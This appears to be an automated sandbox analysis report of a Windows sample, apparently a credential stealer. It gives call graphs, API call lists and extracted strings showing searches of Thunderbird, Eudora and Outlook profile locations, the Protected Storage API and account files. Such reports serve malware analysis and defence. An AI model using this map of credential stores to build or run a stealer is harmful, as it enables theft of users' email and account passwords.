33307 409a83 ??2@YAPAXI ??2@YAPAXI 33305->33307 33308 409a73 ??3@YAXPAX 33305->33308 33309 409a7c ??3@YAXPAX 33305->33309 33306->33305 33307->33291 33308->33309 33309->33307 33311 407a55 free 33310->33311 33312 409ba5 33311->33312 33313 407a55 free 33312->33313 33314 409bad 33313->33314 33315 407a55 free 33314->33315 33316 409bb5 33315->33316 33317 407a55 free 33316->33317 33318 409bbd 33317->33318 33319 407a1f 4 API calls 33318->33319 33320 409bd0 33319->33320 33321 407a1f 4 API calls 33320->33321 33322 409bda 33321->33322 33323 407a1f 4 API calls 33322->33323 33324 409be4 33323->33324 33325 407a1f 4 API calls 33324->33325 33326 409bee 33325->33326 33326->33299 33328 410d0e 2 API calls 33327->33328 33329 410dca 33328->33329 33330 410dfd memset 33329->33330 33369 4070ae 33329->33369 33331 410e1d 33330->33331 33372 410a9c RegOpenKeyExA 33331->33372 33335 401e9e strlen strlen 33335->33203 33335->33204 33336 410e4a 33337 410e7f _mbscpy 33336->33337 33373 410d3d _mbscpy 33336->33373 33337->33335 33339 410e5b 33374 410add RegQueryValueExA 33339->33374 33341 410e73 RegCloseKey 33341->33337 33342->33207 33343->33213 33375 410a9c RegOpenKeyExA 33344->33375 33346 401c4c 33347 401cad 33346->33347 33376 410add RegQueryValueExA 33346->33376 33347->33216 33347->33218 33349 401c6a 33350 401c71 strchr 33349->33350 33351 401ca4 RegCloseKey 33349->33351 33350->33351 33352 401c85 strchr 33350->33352 33351->33347 33352->33351 33353 401c94 33352->33353 33377 406f06 strlen 33353->33377 33355 401ca1 33355->33351 33356->33219 33357->33204 33358->33211 33359->33235 33380 410a9c RegOpenKeyExA 33360->33380 33362 410b34 33363 410b5d 33362->33363 33381 410add RegQueryValueExA 33362->33381 33363->33235 33365 410b4c RegCloseKey 33365->33363 33367->33235 33368->33224 33370 4070bd GetVersionExA 33369->33370 33371 4070ce 33369->33371 33370->33371 33371->33330 33371->33335 33372->33336 33373->33339 33374->33341 33375->33346 33376->33349 33378 406f17 33377->33378 33379 406f1a memcpy 33377->33379 33378->33379 33379->33355 33380->33362 33381->33365 33383 409b40 33382->33383 33385 409b4e 33382->33385 33390 409901 memset SendMessageA 33383->33390 33386 409b99 33385->33386 33387 409b8b 33385->33387 33386->33248 33391 409868 SendMessageA 33387->33391 33389->33244 33390->33385 33391->33386 33392->33251 33393->33254 33395 4047a3 33394->33395 33396 404799 FreeLibrary 33394->33396 33395->33254 33396->33395 33398 4107f1 FreeLibrary 33397->33398 33399 403c30 LoadLibraryA 33398->33399 33400 403c74 33399->33400 33401 403c44 GetProcAddress 33399->33401 33403 4107f1 FreeLibrary 33400->33403 33401->33400 33402 403c5e 33401->33402 33402->33400 33406 403c6b 33402->33406 33404 403c7b 33403->33404 33405 404734 3 API calls 33404->33405 33407 403c86 33405->33407 33406->33404 33485 4036e5 33407->33485 33410 4036e5 27 API calls 33411 403c9a 33410->33411 33412 4036e5 27 API calls 33411->33412 33413 403ca4 33412->33413 33414 4036e5 27 API calls 33413->33414 33415 403cae 33414->33415 33497 4085d2 33415->33497 33423 403ce5 33424 403cf7 33423->33424 33678 402bd1 40 API calls 33423->33678 33543 410a9c RegOpenKeyExA 33424->33543 33427 403d0a 33428 403d1c 33427->33428 33679 402bd1 40 API calls 33427->33679 33544 402c5d 33428->33544 33432 4070ae GetVersionExA 33433 403d31 33432->33433 33562 410a9c RegOpenKeyExA 33433->33562 33435 403d51 33436 403d61 33435->33436 33680 402b22 47 API calls 33435->33680 33563 410a9c RegOpenKeyExA 33436->33563 33439 403d87 33440 403d97 33439->33440 33681 402b22 47 API calls 33439->33681 33564 410a9c RegOpenKeyExA 33440->33564 33443 403dbd 33444 403dcd 33443->33444 33682 402b22 47 API calls 33443->33682 33565 410808 33444->33565 33448 404785 FreeLibrary 33449 403de8 33448->33449 33569 402fdb 33449->33569 33452 402fdb 34 API calls 33453 403e00 33452->33453 33585 4032b7 33453->33585 33462 403e3b 33463 403e73 33462->33463 33464 403e46 _mbscpy 33462->33464 33632 40fb00 33463->33632 33684 40f334 334 API calls 33464->33684 33474 410807 33473->33474 33475 4107fc FreeLibrary 33473->33475 33474->33254 33475->33474 33477 404785 FreeLibrary 33476->33477 33478 40473b LoadLibraryA 33477->33478 33479 40474c GetProcAddress 33478->33479 33482 40476e 33478->33482 33480 404764 33479->33480 33479->33482 33480->33482 33481 404781 33481->33254 33482->33481 33483 404785 FreeLibrary 33482->33483 33483->33481 33484->33253 33486 4037c5 33485->33486 33487 4036fb 33485->33487 33486->33410 33685 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33487->33685 33489 40370e 33489->33486 33490 403716 strchr 33489->33490 33490->33486 33491 403730 33490->33491 33686 4021b6 memset 33491->33686 33493 40373f _mbscpy _mbscpy strlen 33494 4037a4 _mbscpy 33493->33494 33495 403789 sprintf 33493->33495 33687 4023e5 16 API calls 33494->33687 33495->33494 33498 4085e2 33497->33498 33688 4082cd 11 API calls 33498->33688 33502 408600 33503 403cba 33502->33503 33504 40860b memset 33502->33504 33515 40821d 33503->33515 33691 410b62 RegEnumKeyExA 33504->33691 33506 4086d2 RegCloseKey 33506->33503 33508 408637 33508->33506 33509 40865c memset 33508->33509 33692 410a9c RegOpenKeyExA 33508->33692 33695 410b62 RegEnumKeyExA 33508->33695 33693 410add RegQueryValueExA 33509->33693 33512 408694 33694 40848b 10 API calls 33512->33694 33514 4086ab RegCloseKey 33514->33508 33696 410a9c RegOpenKeyExA 33515->33696 33517 40823f 33518 403cc6 33517->33518 33519 408246 memset 33517->33519 33527 4086e0 33518->33527 33697 410b62 RegEnumKeyExA 33519->33697 33521 4082bf RegCloseKey 33521->33518 33523 40826f 33523->33521 33698 410a9c RegOpenKeyExA 33523->33698 33699 4080ed 11 API calls 33523->33699 33700 410b62 RegEnumKeyExA 33523->33700 33526 4082a2 RegCloseKey 33526->33523 33701 4045db 33527->33701 33529 4088ef 33709 404656 33529->33709 33533 408737 wcslen 33533->33529 33539 40876a 33533->33539 33534 40877a wcsncmp 33534->33539 33536 404734 3 API calls 33536->33539 33537 404785 FreeLibrary 33537->33539 33538 408812 memset 33538->33539 33540 40883c memcpy wcschr 33538->33540 33539->33529 33539->33534 33539->33536 33539->33537 33539->33538 33539->33540 33541 4088c3 LocalFree 33539->33541 33712 40466b _mbscpy 33539->33712 33540->33539 33541->33539 33542 410a9c RegOpenKeyExA 33542->33423 33543->33427 33713 410a9c RegOpenKeyExA 33544->33713 33546 402c7a 33547 402da5 33546->33547 33548 402c87 memset 33546->33548 33547->33432 33714 410b62 RegEnumKeyExA 33548->33714 33550 402d9c RegCloseKey 33550->33547 33551 410b1e 3 API calls 33552 402ce4 memset sprintf 33551->33552 33715 410a9c RegOpenKeyExA 33552->33715 33554 402d28 33555 402d3a sprintf 33554->33555 33716 402bd1 40 API calls 33554->33716 33717 410a9c RegOpenKeyExA 33555->33717 33560 402cb2 33560->33550 33560->33551 33561 402d9a 33560->33561 33718 402bd1 40 API calls 33560->33718 33719 410b62 RegEnumKeyExA 33560->33719 33561->33550 33562->33435 33563->33439 33564->33443 33566 410816 33565->33566 33567 4107f1 FreeLibrary 33566->33567 33568 403ddd 33567->33568 33568->33448 33720 410a9c RegOpenKeyExA 33569->33720 33571 402ff9 33572 403006 memset 33571->33572 33573 40312c 33571->33573 33721 410b62 RegEnumKeyExA 33572->33721 33573->33452 33575 403122 RegCloseKey 33575->33573 33576 410b1e 3 API calls 33577 403058 memset sprintf 33576->33577 33722 410a9c RegOpenKeyExA 33577->33722 33579 403033 33579->33575 33579->33576 33580 4030a2 memset 33579->33580 33582 410b62 RegEnumKeyExA 33579->33582 33583 4030f9 RegCloseKey 33579->33583 33724 402db3 26 API calls 33579->33724 33723 410b62 RegEnumKeyExA 33580->33723 33582->33579 33583->33579 33586 4032d5 33585->33586 33587 4033a9 33585->33587 33725 4021b6 memset 33586->33725 33600 4034e4 memset memset 33587->33600 33589 4032e1 33726 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33589->33726 33591 4032ea 33592 4032f8 memset GetPrivateProfileSectionA 33591->33592 33727 4023e5 16 API calls 33591->33727 33592->33587 33597 40332f 33592->33597 33594 40339b strlen 33594->33587 33594->33597 33596 403350 strchr 33596->33597 33597->33587 33597->33594 33728 4021b6 memset 33597->33728 33729 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33597->33729 33730 4023e5 16 API calls 33597->33730 33601 410b1e 3 API calls 33600->33601 33602 40353f 33601->33602 33603 40357f 33602->33603 33604 403546 _mbscpy 33602->33604 33608 403985 33603->33608 33731 406d55 strlen _mbscat 33604->33731 33606 403565 _mbscat 33732 4033f0 19 API calls 33606->33732 33733 40466b _mbscpy 33608->33733 33612 4039aa 33613 4039ff 33612->33613 33734 40f460 memset memset 33612->33734 33755 40f6e2 33612->33755 33771 4038e8 21 API calls 33612->33771 33615 404785 FreeLibrary 33613->33615 33616 403a0b 33615->33616 33617 4037ca memset memset 33616->33617 33779 444551 memset 33617->33779 33619 4038e2 33619->33462 33683 40f334 334 API calls 33619->33683 33622 40382e 33623 406f06 2 API calls 33622->33623 33624 403843 33623->33624 33625 406f06 2 API calls 33624->33625 33626 403855 strchr 33625->33626 33627 403884 _mbscpy 33626->33627 33628 403897 strlen 33626->33628 33629 4038bf _mbscpy 33627->33629 33628->33629 33630 4038a4 sprintf 33628->33630 33791 4023e5 16 API calls 33629->33791 33630->33629 33633 44b090 33632->33633 33634 40fb10 RegOpenKeyExA 33633->33634 33635 403e7f 33634->33635 33636 40fb3b RegOpenKeyExA 33634->33636 33646 40f96c 33635->33646 33637 40fb55 RegQueryValueExA 33636->33637 33638 40fc2d RegCloseKey 33636->33638 33639 40fc23 RegCloseKey 33637->33639 33640 40fb84 33637->33640 33638->33635 33639->33638 33641 404734 3 API calls 33640->33641 33642 40fb91 33641->33642 33642->33639 33643 40fc19 LocalFree 33642->33643 33644 40fbdd memcpy memcpy 33642->33644 33643->33639 33796 40f802 11 API calls 33644->33796 33647 4070ae GetVersionExA 33646->33647 33648 40f98d 33647->33648 33649 4045db 7 API calls 33648->33649 33650 40f9a9 33649->33650 33653 40fae6 33650->33653 33654 40fa13 memset WideCharToMultiByte 33650->33654 33651 404656 FreeLibrary 33652 403e85 33651->33652 33658 4442ea memset 33652->33658 33653->33651 33654->33650 33655 40fa43 _strnicmp 33654->33655 33655->33650 33656 40fa5b WideCharToMultiByte 33655->33656 33656->33650 33657 40fa88 WideCharToMultiByte 33656->33657 33657->33650 33659 410dbb 9 API calls 33658->33659 33660 444329 33659->33660 33797 40759e strlen strlen 33660->33797 33665 410dbb 9 API calls 33666 444350 33665->33666 33667 40759e 3 API calls 33666->33667 33668 44435a 33667->33668 33669 444212 65 API calls 33668->33669 33670 444366 memset memset 33669->33670 33671 410b1e 3 API calls 33670->33671 33672 4443b9 ExpandEnvironmentStringsA strlen 33671->33672 33673 4443f4 _strcmpi 33672->33673 33674 4443e5 33672->33674 33675 403e91 33673->33675 33676 44440c 33673->33676 33674->33673 33675->33254 33677 444212 65 API calls 33676->33677 33677->33675 33678->33424 33679->33428 33680->33436 33681->33440 33682->33444 33683->33462 33684->33463 33685->33489 33686->33493 33687->33486 33689 40841c 33688->33689 33690 410a9c RegOpenKeyExA 33689->33690 33690->33502 33691->33508 33692->33508 33693->33512 33694->33514 33695->33508 33696->33517 33697->33523 33698->33523 33699->33526 33700->33523 33702 404656 FreeLibrary 33701->33702 33703 4045e3 LoadLibraryA 33702->33703 33704 404651 33703->33704 33705 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33703->33705 33704->33529 33704->33533 33706 40463d 33705->33706 33707 404643 33706->33707 33708 404656 FreeLibrary 33706->33708 33707->33704 33708->33704 33710 403cd2 33709->33710 33711 40465c FreeLibrary 33709->33711 33710->33542 33711->33710 33712->33539 33713->33546 33714->33560 33715->33554 33716->33555 33717->33560 33718->33560 33719->33560 33720->33571 33721->33579 33722->33579 33723->33579 33724->33579 33725->33589 33726->33591 33727->33592 33728->33596 33729->33597 33730->33597 33731->33606 33732->33603 33733->33612 33772 4078ba 33734->33772 33737 4078ba _mbsnbcat 33738 40f5a3 RegOpenKeyExA 33737->33738 33739 40f5c3 RegQueryValueExA 33738->33739 33740 40f6d9 33738->33740 33741 40f6d0 RegCloseKey 33739->33741 33742 40f5f0 33739->33742 33740->33612 33741->33740 33742->33741 33743 40f675 33742->33743 33776 40466b _mbscpy 33742->33776 33743->33741 33777 4012ee strlen 33743->33777 33745 40f611 33747 404734 3 API calls 33745->33747 33752 40f616 33747->33752 33748 40f69e RegQueryValueExA 33748->33741 33749 40f6c1 33748->33749 33749->33741 33750 40f66a 33751 404785 FreeLibrary 33750->33751 33751->33743 33752->33750 33753 40f661 LocalFree 33752->33753 33754 40f645 memcpy 33752->33754 33753->33750 33754->33753 33778 40466b _mbscpy 33755->33778 33757 40f6fa 33758 4045db 7 API calls 33757->33758 33759 40f708 33758->33759 33761 404734 3 API calls 33759->33761 33765 40f7e2 33759->33765 33760 404656 FreeLibrary 33762 40f7f1 33760->33762 33766 40f715 33761->33766 33763 404785 FreeLibrary 33762->33763 33764 40f7fc 33763->33764 33764->33612 33765->33760 33766->33765 33767 40f797 WideCharToMultiByte 33766->33767 33768 40f7b8 strlen 33767->33768 33769 40f7d9 LocalFree 33767->33769 33768->33769 33770 40f7c8 _mbscpy 33768->33770 33769->33765 33770->33769 33771->33612 33773 4078e6 33772->33773 33774 4078c7 _mbsnbcat 33773->33774 33775 4078ea 33773->33775 33774->33773 33775->33737 33776->33745 33777->33748 33778->33757 33792 410a9c RegOpenKeyExA 33779->33792 33781 44458b 33782 40381a 33781->33782 33793 410add RegQueryValueExA 33781->33793 33782->33619 33790 4021b6 memset 33782->33790 33784 4445a4 33785 4445dc RegCloseKey 33784->33785 33794 410add RegQueryValueExA 33784->33794 33785->33782 33787 4445c1 33787->33785 33795 444879 30 API calls 33787->33795 33789 4445da 33789->33785 33790->33622 33791->33619 33792->33781 33793->33784 33794->33787 33795->33789 33796->33643 33798 4075c9 33797->33798 33799 4075bb _mbscat 33797->33799 33800 444212 33798->33800 33799->33798 33817 407e9d 33800->33817 33803 44424d 33804 444274 33803->33804 33806 444258 33803->33806 33825 407ef8 33803->33825 33805 407e9d 9 API calls 33804->33805 33814 4442a0 33805->33814 33838 444196 52 API calls 33806->33838 33808 407ef8 9 API calls 33808->33814 33809 4442ce 33835 407f90 33809->33835 33813 407f90 FindClose 33815 4442e4 33813->33815 33814->33808 33814->33809 33816 444212 65 API calls 33814->33816 33839 407e62 strcmp strcmp 33814->33839 33815->33665 33816->33814 33818 407f90 FindClose 33817->33818 33819 407eaa 33818->33819 33820 406f06 2 API calls 33819->33820 33821 407ebd strlen strlen 33820->33821 33822 407ee1 33821->33822 33823 407eea 33821->33823 33840 4070e3 strlen _mbscat _mbscpy _mbscat 33822->33840 33823->33803 33826 407f03 FindFirstFileA 33825->33826 33827 407f24 FindNextFileA 33825->33827 33830 407f3f 33826->33830 33828 407f46 strlen strlen 33827->33828 33829 407f3a 33827->33829 33832 407f7f 33828->33832 33833 407f76 33828->33833 33831 407f90 FindClose 33829->33831 33830->33828 33830->33832 33831->33830 33832->33803 33841 4070e3 strlen _mbscat _mbscpy _mbscat 33833->33841 33836 407fa3 33835->33836 33837 407f99 FindClose 33835->33837 33836->33813 33837->33836 33838->33803 33839->33814 33840->33823 33841->33832 33842->33267 33843->33271 33844->33277 33845->33278 33846->33284 33847->33281 33848->33276 34193 43ffc8 18 API calls 34195 4383cc 110 API calls __fprintf_l 34007 4275d3 41 API calls 34196 4153d3 22 API calls __fprintf_l 34008 444dd7 _XcptFilter 34201 4013de 15 API calls 34203 425115 111 API calls __fprintf_l 34204 43f7db 18 API calls 34207 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34011 4335ee 16 API calls __fprintf_l 34209 429fef 11 API calls 34012 444deb _exit _c_exit 34210 40bbf0 138 API calls 34015 425115 79 API calls __fprintf_l 34214 437ffa 22 API calls 34019 4021ff 14 API calls 34020 43f5fc 149 API calls 34215 40e381 9 API calls 34022 405983 40 API calls 34023 42b186 27 API calls __fprintf_l 34024 427d86 76 API calls 34025 403585 20 API calls 34027 42e58e 18 API calls __fprintf_l 34030 425115 75 API calls __fprintf_l 34032 401592 8 API calls 32934 410b92 32937 410a6b 32934->32937 32936 410bb2 32938 410a77 32937->32938 32939 410a89 GetPrivateProfileIntA 32937->32939 32942 410983 memset _itoa WritePrivateProfileStringA 32938->32942 32939->32936 32941 410a84 32941->32936 32942->32941 34219 434395 16 API calls 34034 441d9c memcmp 34221 43f79b 119 API calls 34035 40c599 43 API calls 34222 426741 87 API calls 34039 4401a6 21 API calls 34041 426da6 memcpy memset memset memcpy 34042 4335a5 15 API calls 34044 4299ab memset memset memcpy memset memset 34045 40b1ab 8 API calls 34227 425115 76 API calls __fprintf_l 34231 4113b2 18 API calls 2 library calls 34235 40a3b8 memset sprintf SendMessageA 33849 410bbc 33852 4109cf 33849->33852 33853 4109dc 33852->33853 33854 410a23 memset GetPrivateProfileStringA 33853->33854 33855 4109ea memset 33853->33855 33860 407646 strlen 33854->33860 33865 4075cd sprintf memcpy 33855->33865 33858 410a0c WritePrivateProfileStringA 33859 410a65 33858->33859 33861 40765a 33860->33861 33863 40765c 33860->33863 33861->33859 33862 4076a3 33862->33859 33863->33862 33866 40737c strtoul 33863->33866 33865->33858 33866->33863 34047 40b5bf memset memset _mbsicmp

                                                                                                                          Executed Functions

                                                                                                                          Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040832F
                                                                                                                          • memset.MSVCRT ref: 00408343
                                                                                                                          • memset.MSVCRT ref: 0040835F
                                                                                                                          • memset.MSVCRT ref: 00408376
                                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                          • strlen.MSVCRT ref: 004083E9
                                                                                                                          • strlen.MSVCRT ref: 004083F8
                                                                                                                          • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                                          • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                          • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                          Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 455 407f3f-407f44 451->455 453 407f46-407f74 strlen * 2 452->453 454 407f3a call 407f90 452->454 458 407f83 453->458 459 407f76-407f81 call 4070e3 453->459 454->455 455->453 457 407f89-407f8f 455->457 461 407f86-407f88 458->461 459->461 461->457
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                          • strlen.MSVCRT ref: 00407F5C
                                                                                                                          • strlen.MSVCRT ref: 00407F64
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                                          • String ID: ACD
                                                                                                                          • API String ID: 379999529-620537770
                                                                                                                          • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                          • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                                                                                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                          Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00401E8B
                                                                                                                          • strlen.MSVCRT ref: 00401EA4
                                                                                                                          • strlen.MSVCRT ref: 00401EB2
                                                                                                                          • strlen.MSVCRT ref: 00401EF8
                                                                                                                          • strlen.MSVCRT ref: 00401F06
                                                                                                                          • memset.MSVCRT ref: 00401FB1
                                                                                                                          • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                                                                                          • memset.MSVCRT ref: 00402003
                                                                                                                          • sprintf.MSVCRT ref: 00402030
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • memset.MSVCRT ref: 00402086
                                                                                                                          • memset.MSVCRT ref: 0040209B
                                                                                                                          • strlen.MSVCRT ref: 004020A1
                                                                                                                          • strlen.MSVCRT ref: 004020AF
                                                                                                                          • strlen.MSVCRT ref: 004020E2
                                                                                                                          • strlen.MSVCRT ref: 004020F0
                                                                                                                          • memset.MSVCRT ref: 00402018
                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                          • API String ID: 1846531875-4223776976
                                                                                                                          • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                          • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                          Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                                                                                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                                                                                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                          • API String ID: 745651260-375988210
                                                                                                                          • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                          • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                          Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                          Strings
                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
